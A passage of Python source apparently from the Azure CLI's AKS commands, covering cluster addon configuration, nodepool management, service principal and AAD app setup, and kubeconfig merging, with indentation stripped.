addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise AzureInternalError(
'The open-service-mesh addon is already enabled for this managed '
'cluster.\n To change open-service-mesh configuration, run '
'"az aks disable-addons -a open-service-mesh -n {} -g {}" '
'before enabling it again.'
.format(name, resource_group_name))
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise ArgumentUsageError(
'The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" ' # pylint: disable=line-too-long
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"}
)
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cmd,
assignee,
acr_name_or_id,
subscription_id,
detach=False,
is_service_principal=True):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cmd, assignee, registry.id, detach, is_service_principal)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cmd.cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cmd, assignee, registry.id, detach, is_service_principal)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
os_sku=None,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_fips_image=False,
no_wait=False,
aks_custom_headers=None):
AgentPool = cmd.get_models('AgentPool',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
enable_fips=enable_fips_image
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
agent_pool,
headers=aks_custom_headers,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False,
aks_custom_headers=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
# Note: we exclude this option because node image upgrade can't accept nodepool put fields like max surge
if max_surge and node_image_only:
raise MutuallyExclusiveArgumentError(
'Conflicting flags. Unable to specify max-surge with node-image-only.'
'If you want to use max-surge with a node image upgrade, please first '
'update max-surge using "az aks nodepool update --max-surge".'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
labels=None,
no_wait=False,
aks_custom_headers=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode and not max_surge and not labels):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--labels"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cmd,
assignee,
registry_id,
detach=False,
is_service_principal=True):
if detach:
if not _delete_role_assignments(cmd.cli_ctx,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cmd,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal, aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cmd,
cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[
app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
